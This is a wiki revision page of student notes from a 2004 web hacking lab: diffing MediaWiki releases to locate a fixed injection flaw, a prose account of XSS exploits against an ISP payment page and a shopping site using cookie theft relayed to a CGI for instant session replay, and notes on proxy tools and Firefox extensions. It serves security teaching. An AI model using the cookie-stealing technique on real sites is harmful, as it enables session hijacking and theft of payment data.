Difference between revisions of "Summerschool Aachen 2004/Hacking the Web Lab"
Mario Manno (talk | contribs) |
|||
Line 26: | Line 26: | ||
-- [[Mario Manno]] | -- [[Mario Manno]] | ||
+ | |||
+ | == Firefox extensions == | ||
+ | I took a look at some of the web proxies mentioned in the lecture this morning, and decided to investigate developing a [http://www.mozilla.org/products/firefox/ Firefox] extension to get some of the same functionality (without the pain!). I didn't get very far, but I did find some useful resources, and looked at the source code for a number of existing extensions. | ||
+ | |||
+ | * [http://extensions.roachfiend.com/howto.php How to write Firefox extensions] | ||
+ | * [http://www.xulplanet.com/tutorials/xultu/intro.html XUL tutorial] | ||
+ | |||
+ | -- [[Stephen Lewis]] |
Revision as of 18:58, 21 September 2004
Contents
The mediawiki vulnerability
Sourceforge has the source code for all previous versions of mediawiki still available, including the 1.3.0 beta versions. I downloaded beta4 and the final 1.3.0 version and did a diff -uNr, resulting in ~ 20000 (reduced to ~ 16000 without whitespace-only changes) lines. Most noticable changes include:
- additional addslashes calls in several places
- addslashes gets substituted by a new function escapePhpString in some places
Real World XSS exploits
Last year, myself and a friend found an XSS vulnerability on an ISP's website (NTL), and I wrote an exploit for it. A journalist picked this up and there is a short article on it in The Register. The vulnerability was particularly problematic, since the page in question was to enter credit card details so Javascript could be used to forward the details elsewhere. Also many other services, such as webmail, account management and purchasing services were run under the same domain name, so it could steal cookies used for these. There is also a blog posting which gives more details (after it was fixed).
The reason Matthew asked me about this was that I had previously written an exploit for another website (I mention this in another blog post). This was a little more interesting technically, since the session cookies for the site had a fairly short expiry. The normal technique is to use Javascript to steal the cookie, then send it back to the attacker for later use. Since the session would probably not be valid by the time the attacker got around to getting the cookie, I had to try a different attack. I wrote a Python CGI which would take the session cookie as a form parameter, then used the XSS vulnerability to insert Javascript to steal the cookie and send it to the CGI. The CGI then immediately took the session cookie and retreived the contents of the victims shopping cart, as a proof of concept. Because this happened without any human interaction, the session cookie expiry was not an issue.
If you are interested in finding more vulnerable webpages then looking for "Widdecombe of the Week" or "Widdy" in the NTK newsletter should find plenty.
Puzzle Game dievo.org
Nice playground for html tricks. Currently i am stuck level 1.
Spent most of the time installing java and WebScarab. LifeHeaders on the contrary is a more passiv approach. I like Paros Proxy, too. You might want to install another firefox plugin Switch Proxy.
-- Mario Manno
Firefox extensions
I took a look at some of the web proxies mentioned in the lecture this morning, and decided to investigate developing a Firefox extension to get some of the same functionality (without the pain!). I didn't get very far, but I did find some useful resources, and looked at the source code for a number of existing extensions.